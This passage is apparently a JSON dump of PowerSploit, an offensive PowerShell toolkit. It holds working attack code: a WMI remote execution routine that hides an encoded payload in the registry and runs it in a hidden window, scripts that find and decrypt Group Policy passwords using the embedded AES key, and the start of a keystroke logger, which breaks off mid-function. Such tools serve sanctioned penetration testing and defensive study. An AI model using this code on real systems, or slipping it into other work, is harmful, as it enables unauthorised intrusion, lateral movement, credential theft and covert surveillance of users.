$HKEY_LOCAL_MACHINE, $PSSettingsPath, $PSPathValueName\n\n            if ($Result.ReturnValue -ne 0) {\n                throw \"[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\\$PSSettingsPath\\$PSPathValueName\"\n            }\n\n            $PowerShellPath = $Result.sValue\n            Write-Verbose \"[$Computer] Full PowerShell path: $PowerShellPath\"\n\n            $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload))\n\n            Write-Verbose \"[$Computer] Storing the payload into the following registry value: $RegistryHive\\$RegistryKeyPath\\$RegistryPayloadValueName\"\n            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\default' -Class 'StdRegProv' -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $EncodedPayload, $RegistryPayloadValueName\n\n            if ($Result.ReturnValue -ne 0) {\n                throw \"[$Computer] Unable to store the payload in the following registry value: $RegistryHive\\$RegistryKeyPath\\$RegistryPayloadValueName\"\n            }\n\n            # Prep the script runner payload from the remote system\n            $PayloadRunnerArgs = @\"\n                `$Hive = '$Hive'\n                `$RegistryKeyPath = '$RegistryKeyPath'\n                `$RegistryPayloadValueName = '$RegistryPayloadValueName'\n                `$RegistryResultValueName = '$RegistryResultValueName'\n                `n\n\"@\n\n            $RemotePayloadRunner = $PayloadRunnerArgs + {\n                $WmiMethodArgs = @{\n                    Namespace = 'Root\\default'\n                    Class = 'StdRegProv'\n                }\n\n                $Result = Invoke-WmiMethod @WmiMethodArgs -Name 'GetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName\n\n                if (($Result.ReturnValue -eq 0) -and ($Result.sValue)) {\n                    $Payload = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Result.sValue))\n\n                    $TempSerializedResultPath = [IO.Path]::GetTempFileName()\n\n                    $PayloadResult = Invoke-Expression ($Payload)\n\n                    Export-Clixml -InputObject $PayloadResult -Path $TempSerializedResultPath\n\n                    $SerilizedPayloadText = [IO.File]::ReadAllText($TempSerializedResultPath)\n\n                    $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadText, $RegistryResultValueName\n\n                    Remove-Item -Path $SerilizedPayloadResult -Force\n\n                    $null = Invoke-WmiMethod @WmiMethodArgs -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName\n                }\n            }\n\n            $Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner))\n\n            $Cmdline = \"$PowerShellPath -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload\"\n\n            # Execute the payload runner on the remote system\n            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline\n\n            Start-Sleep -Seconds 5\n\n            if ($Result.ReturnValue -ne 0) {\n                throw \"[$Computer] Unable to execute payload stored within the following registry value: $RegistryHive\\$RegistryKeyPath\\$RegistryPayloadValueName\"\n            }\n\n            Write-Verbose \"[$Computer] Payload successfully executed from: $RegistryHive\\$RegistryKeyPath\\$RegistryPayloadValueName\"\n\n            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryResultValueName\n\n            if ($Result.ReturnValue -ne 0) {\n                throw \"[$Computer] Unable retrieve the payload results from the following registry value: $RegistryHive\\$RegistryKeyPath\\$RegistryResultValueName\"\n            }\n\n            Write-Verbose \"[$Computer] Payload results successfully retrieved from: $RegistryHive\\$RegistryKeyPath\\$RegistryResultValueName\"\n\n            $SerilizedPayloadResult = $Result.sValue\n\n            $TempSerializedResultPath = [IO.Path]::GetTempFileName()\n\n            Out-File -InputObject $SerilizedPayloadResult -FilePath $TempSerializedResultPath\n            $PayloadResult = Import-Clixml -Path $TempSerializedResultPath\n\n            Remove-Item -Path $TempSerializedResultPath\n\n            $FinalResult = New-Object PSObject -Property @{\n                PSComputerName = $Computer\n                PayloadOutput = $PayloadResult\n            }\n\n            Write-Verbose \"[$Computer] Removing the following registry value: $RegistryHive\\$RegistryKeyPath\\$RegistryResultValueName\"\n            $null = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\default' -Class 'StdRegProv' -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryResultValueName\n\n            Write-Verbose \"[$Computer] Removing the following registry key: $RegistryHive\\$RegistryKeyPath\"\n            $null = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\default' -Class 'StdRegProv' -Name 'DeleteKey' -ArgumentList $Hive, $RegistryKeyPath\n\n            return $FinalResult\n        }\n    }\n}\n"
  },
  {
    "path": "CodeExecution/Usage.md",
    "content": "To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\r\n\r\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\r\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\r\n\r\nTo use the module, type `Import-Module CodeExecution`\r\n\r\nTo see the commands imported, type `Get-Command -Module CodeExecution`\r\n\r\nFor help on each individual command, Get-Help is your friend.\r\n\r\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability."
  },
  {
    "path": "Exfiltration/Exfiltration.psd1",
    "content": "@{\r\n\r\n# Script module or binary module file associated with this manifest.\r\nModuleToProcess = 'Exfiltration.psm1'\r\n\r\n# Version number of this module.\r\nModuleVersion = '3.0.0.0'\r\n\r\n# ID used to uniquely identify this module\r\nGUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'\r\n\r\n# Author of this module\r\nAuthor = 'Matthew Graeber'\r\n\r\n# Copyright statement for this module\r\nCopyright = 'BSD 3-Clause'\r\n\r\n# Description of the functionality provided by this module\r\nDescription = 'PowerSploit Exfiltration Module'\r\n\r\n# Minimum version of the Windows PowerShell engine required by this module\r\nPowerShellVersion = '2.0'\r\n\r\n# Format files (.ps1xml) to be loaded when importing this module\r\nFormatsToProcess = 'Get-VaultCredential.ps1xml'\r\n\r\n# Functions to export from this module\r\nFunctionsToExport = '*'\r\n\r\n# List of all files packaged with this module\r\nFileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',\r\n           'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',\r\n           'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',\r\n           'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',\r\n           'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'\r\n\r\n}\r\n"
  },
  {
    "path": "Exfiltration/Exfiltration.psm1",
    "content": "Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}\n"
  },
  {
    "path": "Exfiltration/Get-GPPAutologon.ps1",
    "content": "function Get-GPPAutologon \n{\n<#\n.SYNOPSIS\n\n    Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.\n\n    PowerSploit Function: Get-GPPAutologon\n    Author: Oddvar Moe (@oddvarmoe)\n    Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n \n.DESCRIPTION\n\n    Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.\n\n.EXAMPLE\n\n    PS C:\\> Get-GPPAutolgon\n    \n    UserNames                                    File                                         Passwords                                  \n    ---------                                    ----                                         ---------                                  \n    {administrator}                              \\\\ADATUM.COM\\SYSVOL\\Adatum.com\\Policies\\{... {PasswordsAreLam3}                    \n    {NormalUser}                                 \\\\ADATUM.COM\\SYSVOL\\Adatum.com\\Policies\\{... {ThisIsAsupaPassword}                    \n\n\n.EXAMPLE\n\n    PS C:\\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq\n    \n    password\n    password12\n    password123\n    password1234\n    password1234$\n    read123\n    Recycling*3ftw!\n\n.LINK\n    \n    https://support.microsoft.com/nb-no/kb/324737\n#>\n    \n    [CmdletBinding()]\n    Param ()\n    \n    #Some XML issues between versions\n    Set-StrictMode -Version 2\n    \n    #define helper function to parse fields from xml files\n    function Get-GPPInnerFields \n    {\n    [CmdletBinding()]\n        Param (\n            $File \n        )\n    \n        try \n        {\n            $Filename = Split-Path $File -Leaf\n            [xml] $Xml = Get-Content ($File)\n\n            #declare empty arrays\n            $Password = @()\n            $UserName = @()\n            \n            #check for password and username field\n            if (($Xml.innerxml -like \"*DefaultPassword*\") -and ($Xml.innerxml -like \"*DefaultUserName*\"))\n            {\n                $props = $xml.GetElementsByTagName(\"Properties\")\n                foreach($prop in $props)\n                {\n                    switch ($prop.name) \n                    {\n                        'DefaultPassword'\n                        {\n                            $Password += , $prop | Select-Object -ExpandProperty Value\n                        }\n                    \n                        'DefaultUsername'\n                        {\n                            $Username += , $prop | Select-Object -ExpandProperty Value\n                        }\n                }\n\n                    Write-Verbose \"Potential password in $File\"\n                }\n                         \n                #put [BLANK] in variables\n                if (!($Password)) \n                {\n                    $Password = '[BLANK]'\n                }\n\n                if (!($UserName))\n                {\n                    $UserName = '[BLANK]'\n                }\n                       \n                #Create custom object to output results\n                $ObjectProperties = @{'Passwords' = $Password;\n                                      'UserNames' = $UserName;\n                                      'File' = $File}\n                    \n                $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties\n                Write-Verbose \"The password is between {} and may be more than one value.\"\n                if ($ResultsObject)\n                {\n                    Return $ResultsObject\n                } \n            }\n        }\n        catch {Write-Error $Error[0]}\n    }\n\n    try {\n        #ensure that machine is domain joined and script is running as a domain account\n        if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {\n            throw 'Machine is not a domain member or User is not a member of the domain.'\n        }\n    \n        #discover potential registry.xml containing autologon passwords\n        Write-Verbose 'Searching the DC. This could take a while.'\n        $XMlFiles = Get-ChildItem -Path \"\\\\$Env:USERDNSDOMAIN\\SYSVOL\" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'\n    \n        if ( -not $XMlFiles ) {throw 'No preference files found.'}\n\n        Write-Verbose \"Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords.\"\n    \n        foreach ($File in $XMLFiles) {\n                $Result = (Get-GppInnerFields $File.Fullname)\n                Write-Output $Result\n        }\n    }\n\n    catch {Write-Error $Error[0]}\n}"
  },
  {
    "path": "Exfiltration/Get-GPPPassword.ps1",
    "content": "function Get-GPPPassword {\n<#\n.SYNOPSIS\n\nRetrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.\n\nPowerSploit Function: Get-GPPPassword  \nAuthor: Chris Campbell (@obscuresec)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nGet-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.\n\n.PARAMETER Server\n\nSpecify the domain controller to search for.\nDefault's to the users current domain\n\n.PARAMETER SearchForest\n\nMap all reaschable trusts and search all reachable SYSVOLs.\n\n.EXAMPLE\n\nGet-GPPPassword\n\nNewName   : [BLANK]\nChanged   : {2014-02-21 05:28:53}\nPasswords : {password12}\nUserNames : {test1}\nFile      : \\\\DEMO.LAB\\SYSVOL\\demo.lab\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\DataSources\\DataSources.xml\n\nNewName   : {mspresenters}\nChanged   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}\nPasswords : {Recycling*3ftw!, password123, password1234}\nUserNames : {Administrator (built-in), DummyAccount, dummy2}\nFile      : \\\\DEMO.LAB\\SYSVOL\\demo.lab\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\Groups.xml\n\nNewName   : [BLANK]\nChanged   : {2014-02-21 05:29:53, 2014-02-21 05:29:52}\nPasswords : {password, password1234$}\nUserNames : {administrator, admin}\nFile      : \\\\DEMO.LAB\\SYSVOL\\demo.lab\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml\n\nNewName   : [BLANK]\nChanged   : {2014-02-21 05:30:14, 2014-02-21 05:30:36}\nPasswords : {password, read123}\nUserNames : {DEMO\\Administrator, admin}\nFile      : \\\\DEMO.LAB\\SYSVOL\\demo.lab\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Services\\Services.xml\n\n.EXAMPLE\n\nGet-GPPPassword -Server EXAMPLE.COM\n\nNewName   : [BLANK]\nChanged   : {2014-02-21 05:28:53}\nPasswords : {password12}\nUserNames : {test1}\nFile      : \\\\EXAMPLE.COM\\SYSVOL\\demo.lab\\Policies\\{31B2F340-016D-11D2-945F-00C04FB982DA}\\MACHINE\\Preferences\\DataSources\\DataSources.xml\n\nNewName   : {mspresenters}\nChanged   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}\nPasswords : {Recycling*3ftw!, password123, password1234}\nUserNames : {Administrator (built-in), DummyAccount, dummy2}\nFile      : \\\\EXAMPLE.COM\\SYSVOL\\demo.lab\\Policies\\{31B2F340-016D-11D2-945F-00C04FB9AB12}\\MACHINE\\Preferences\\Groups\\Groups.xml\n\n.EXAMPLE\n\nGet-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq\n\npassword\npassword12\npassword123\npassword1234\npassword1234$\nread123\nRecycling*3ftw!\n\n.LINK\n\nhttp://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html\nhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1\nhttp://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences\nhttp://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n    [CmdletBinding()]\n    Param (\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Server = $Env:USERDNSDOMAIN,\n\n        [Switch]\n        $SearchForest\n    )\n\n    # define helper function that decodes and decrypts password\n    function Get-DecryptedCpassword {\n        [CmdletBinding()]\n        Param (\n            [string] $Cpassword\n        )\n\n        try {\n            #Append appropriate padding based on string length\n            $Mod = ($Cpassword.length % 4)\n\n            switch ($Mod) {\n                '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}\n                '2' {$Cpassword += ('=' * (4 - $Mod))}\n                '3' {$Cpassword += ('=' * (4 - $Mod))}\n            }\n\n            $Base64Decoded = [Convert]::FromBase64String($Cpassword)\n            \n            # Make sure System.Core is loaded\n            [System.Reflection.Assembly]::LoadWithPartialName(\"System.Core\") |Out-Null\n\n            #Create a new AES .NET Crypto Object\n            $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider\n            [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,\n                                 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)\n\n            #Set IV to all nulls to prevent dynamic generation of IV value\n            $AesIV = New-Object Byte[]($AesObject.IV.Length)\n            $AesObject.IV = $AesIV\n            $AesObject.Key = $AesKey\n            $DecryptorObject = $AesObject.CreateDecryptor()\n            [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)\n\n            return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)\n        }\n\n        catch { Write-Error $Error[0] }\n    }\n\n    # helper function to parse fields from xml files\n    function Get-GPPInnerField {\n    [CmdletBinding()]\n        Param (\n            $File\n        )\n\n        try {\n            $Filename = Split-Path $File -Leaf\n            [xml] $Xml = Get-Content ($File)\n\n            # check for the cpassword field\n            if ($Xml.innerxml -match 'cpassword') {\n\n                $Xml.GetElementsByTagName('Properties') | ForEach-Object {\n                    if ($_.cpassword) {\n                        $Cpassword = $_.cpassword\n                        if ($Cpassword -and ($Cpassword -ne '')) {\n                           $DecryptedPassword = Get-DecryptedCpassword $Cpassword\n                           $Password = $DecryptedPassword\n                           Write-Verbose \"[Get-GPPInnerField] Decrypted password in '$File'\"\n                        }\n\n                        if ($_.newName) {\n                            $NewName = $_.newName\n                        }\n\n                        if ($_.userName) {\n                            $UserName = $_.userName\n                        }\n                        elseif ($_.accountName) {\n                            $UserName = $_.accountName\n                        }\n                        elseif ($_.runAs) {\n                            $UserName = $_.runAs\n                        }\n\n                        try {\n                            $Changed = $_.ParentNode.changed\n                        }\n                        catch {\n                            Write-Verbose \"[Get-GPPInnerField] Unable to retrieve ParentNode.changed for '$File'\"\n                        }\n\n                        try {\n                            $NodeName = $_.ParentNode.ParentNode.LocalName\n                        }\n                        catch {\n                            Write-Verbose \"[Get-GPPInnerField] Unable to retrieve ParentNode.ParentNode.LocalName for '$File'\"\n                        }\n\n                        if (!($Password)) {$Password = '[BLANK]'}\n                        if (!($UserName)) {$UserName = '[BLANK]'}\n                        if (!($Changed)) {$Changed = '[BLANK]'}\n                        if (!($NewName)) {$NewName = '[BLANK]'}\n\n                        $GPPPassword = New-Object PSObject\n                        $GPPPassword | Add-Member Noteproperty 'UserName' $UserName\n                        $GPPPassword | Add-Member Noteproperty 'NewName' $NewName\n                        $GPPPassword | Add-Member Noteproperty 'Password' $Password\n                        $GPPPassword | Add-Member Noteproperty 'Changed' $Changed\n                        $GPPPassword | Add-Member Noteproperty 'File' $File\n                        $GPPPassword | Add-Member Noteproperty 'NodeName' $NodeName\n                        $GPPPassword | Add-Member Noteproperty 'Cpassword' $Cpassword\n                        $GPPPassword\n                    }\n                }\n            }\n        }\n        catch {\n            Write-Warning \"[Get-GPPInnerField] Error parsing file '$File' : $_\"\n        }\n    }\n\n    # helper function (adapted from PowerView) to enumerate the domain/forest trusts for a specified domain\n    function Get-DomainTrust {\n        [CmdletBinding()]\n        Param (\n            $Domain\n        )\n\n        if (Test-Connection -Count 1 -Quiet -ComputerName $Domain) {\n            try {\n                $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)\n                $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)\n                if ($DomainObject) {\n                    $DomainObject.GetAllTrustRelationships() | Select-Object -ExpandProperty TargetName\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-DomainTrust] Error contacting domain '$Domain' : $_\"\n            }\n\n            try {\n                $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Domain)\n                $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)\n                if ($ForestObject) {\n                    $ForestObject.GetAllTrustRelationships() | Select-Object -ExpandProperty TargetName\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-DomainTrust] Error contacting forest '$Domain' (domain may not be a forest object) : $_\"\n            }\n        }\n    }\n\n    # helper function (adapted from PowerView) to enumerate all reachable trusts from the current domain\n    function Get-DomainTrustMapping {\n        [CmdletBinding()]\n        Param ()\n\n        # keep track of domains seen so we don't hit infinite recursion\n        $SeenDomains = @{}\n\n        # our domain stack tracker\n        $Domains = New-Object System.Collections.Stack\n\n        try {\n            $CurrentDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | Select-Object -ExpandProperty Name\n            $CurrentDomain\n        }\n        catch {\n            Write-Warning \"[Get-DomainTrustMapping] Error enumerating current domain: $_\"\n        }\n\n        if ($CurrentDomain -and $CurrentDomain -ne '') {\n            $Domains.Push($CurrentDomain)\n\n            while($Domains.Count -ne 0) {\n\n                $Domain = $Domains.Pop()\n\n                # if we haven't seen this domain before\n                if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) {\n\n                    Write-Verbose \"[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'\"\n\n                    # mark it as seen in our list\n                    $Null = $SeenDomains.Add($Domain, '')\n\n                    try {\n                        # get all the domain/forest trusts for this domain\n                        Get-DomainTrust -Domain $Domain | Sort-Object -Unique | ForEach-Object {\n                            # only output if we haven't already seen this domain and if it's pingable\n                            if (-not $SeenDomains.ContainsKey($_) -and (Test-Connection -Count 1 -Quiet -ComputerName $_)) {\n                                $Null = $Domains.Push($_)\n                                $_\n                            }\n                        }\n                    }\n                    catch {\n                        Write-Verbose \"[Get-DomainTrustMapping] Error: $_\"\n                    }\n                }\n            }\n        }\n    }\n\n    try {\n        $XMLFiles = @()\n        $Domains = @()\n\n        $AllUsers = $Env:ALLUSERSPROFILE\n        if (-not $AllUsers) {\n            $AllUsers = 'C:\\ProgramData'\n        }\n\n        # discover any locally cached GPP .xml files\n        Write-Verbose '[Get-GPPPassword] Searching local host for any cached GPP files'\n        $XMLFiles += Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue\n\n        if ($SearchForest) {\n            Write-Verbose '[Get-GPPPassword] Searching for all reachable trusts'\n            $Domains += Get-DomainTrustMapping\n        }\n        else {\n            if ($Server) {\n                $Domains += , $Server\n            }\n            else {\n                # in case we're in a SYSTEM context\n                $Domains += , [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | Select-Object -ExpandProperty Name\n            }\n        }\n\n        $Domains = $Domains | Where-Object {$_} | Sort-Object -Unique\n\n        ForEach ($Domain in $Domains) {\n            # discover potential domain GPP files containing passwords, not complaining in case of denied access to a directory\n            Write-Verbose \"[Get-GPPPassword] Searching \\\\$Domain\\SYSVOL\\*\\Policies. This could take a while.\"\n            $DomainXMLFiles = Get-ChildItem -Force -Path \"\\\\$Domain\\SYSVOL\\*\\Policies\" -Recurse -ErrorAction SilentlyContinue -Include @('Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml')\n\n            if($DomainXMLFiles) {\n                $XMLFiles += $DomainXMLFiles\n            }\n        }\n\n        if ( -not $XMLFiles ) { throw '[Get-GPPPassword] No preference files found.' }\n\n        Write-Verbose \"[Get-GPPPassword] Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords.\"\n\n        ForEach ($File in $XMLFiles) {\n            $Result = (Get-GppInnerField $File.Fullname)\n            $Result\n        }\n    }\n\n    catch { Write-Error $Error[0] }\n}\n"
  },
  {
    "path": "Exfiltration/Get-Keystrokes.ps1",
    "content": "function Get-Keystrokes {\n<#\n.SYNOPSIS\n\n    Logs keys pressed, time and the active window.\n    \n    PowerSploit Function: Get-Keystrokes\n    Original Authors: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)\n    Revised By: Jesse Davis (@secabstraction)\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n    \n.PARAMETER LogPath\n\n    Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\\key.log.\n\n.PARAMETER Timeout\n\n    Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely.\n\n.PARAMETER PassThru\n\n    Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes.\n\n.EXAMPLE\n\n    Get-Keystrokes -LogPath C:\\key.log\n\n.EXAMPLE\n\n    Get-Keystrokes -Timeout 20\n    \n.LINK\n\n    http://www.obscuresec.com/\n    http://www.exploit-monday.com/\n    https://github.com/secabstraction\n#>\n    [CmdletBinding()] \n    Param (\n        [Parameter(Position = 0)]\n        [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})]\n        [String]$LogPath = \"$($env:TEMP)\\key.log\",\n\n        [Parameter(Position = 1)]\n        [Double]$Timeout,\n\n        [Parameter()]\n        [Switch]$PassThru\n    )\n\n    $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath)\n\n    try { '\"TypedKey\",\"WindowTitle\",\"Time\"' | Out-File -FilePath $LogPath -Encoding unicode }\n    catch { throw $_ }\n\n    $Script = {\n        Param (\n            [Parameter(Position = 0)]\n            [String]$LogPath,\n\n            [Parameter(Position = 1)]\n            [Double]$Timeout\n        )\n\n        function local:Get-DelegateType {\n            Param (\n                [OutputType([Type])]\n            \n                [Parameter( Position = 0)]\n                [Type[]]\n                $Parameters = (New-Object Type[](0)),\n            \n                [Parameter( Position = 1 )]\n                [Type]\n                $ReturnType = [Void]\n            )\n\n            $Domain = [AppDomain]::CurrentDomain\n            $DynAssembly = New-Object Reflection.AssemblyName('ReflectedDelegate')\n            $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n            $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n            $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n            $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n            $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n            $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n        \n            $TypeBuilder.CreateType()\n        }\n        function local:Get-ProcAddress {\n            Param (\n                [OutputType([IntPtr])]\n        \n                [Parameter( Position = 0, Mandatory = $True )]\n                [String]\n                $Module,\n            \n                [Parameter( Position = 1, Mandatory = $True )]\n                [String]\n                $Procedure\n            )\n\n            # Get a reference to System.dll in the GAC\n            $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n                Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n            $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n            # Get a reference to the GetModuleHandle and GetProcAddress methods\n            $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n            # Get a handle to the module specified\n            $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n            $tmpPtr = New-Object IntPtr\n            $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n        \n            # Return the address of the function\n            $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n        }\n\n        #region Imports\n\n        [void][Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')\n\n        # SetWindowsHookEx\n        $SetWindowsHookExAddr = Get-ProcAddress user32.dll SetWindowsHookExA\n\t    $SetWindowsHookExDelegate = Get-DelegateType @([Int32], [MulticastDelegate], [IntPtr], [Int32]) ([IntPtr])\n\t    $SetWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetWindowsHookExAddr, $SetWindowsHookExDelegate)\n\n        # CallNextHookEx\n        $CallNextHookExAddr = Get-ProcAddress user32.dll CallNextHookEx\n\t    $CallNextHookExDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr], [IntPtr]) ([IntPtr])\n\t    $CallNextHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CallNextHookExAddr, $CallNextHookExDelegate)\n\n        # UnhookWindowsHookEx\n        $UnhookWindowsHookExAddr = Get-ProcAddress user32.dll UnhookWindowsHookEx\n\t    $UnhookWindowsHookExDelegate = Get-DelegateType @([IntPtr]) ([Void])\n\t    $UnhookWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UnhookWindowsHookExAddr, $UnhookWindowsHookExDelegate)\n\n        # PeekMessage\n        $PeekMessageAddr = Get-ProcAddress user32.dll PeekMessageA\n\t    $PeekMessageDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) ([Void])\n\t    $PeekMessage = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PeekMessageAddr, $PeekMessageDelegate)\n\n        # GetAsyncKeyState\n        $GetAsyncKeyStateAddr = Get-ProcAddress user32.dll GetAsyncKeyState\n\t    $GetAsyncKeyStateDelegate = Get-DelegateType @([Windows.Forms.Keys]) ([Int16])\n\t    $GetAsyncKeyState = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAsyncKeyStateAddr, $GetAsyncKeyStateDelegate)\n\n        # GetForegroundWindow\n        $GetForegroundWindowAddr = Get-ProcAddress user32.dll GetForegroundWindow\n\t    $GetForegroundWindowDelegate = Get-DelegateType @() ([IntPtr])\n\t    $GetForegroundWindow = 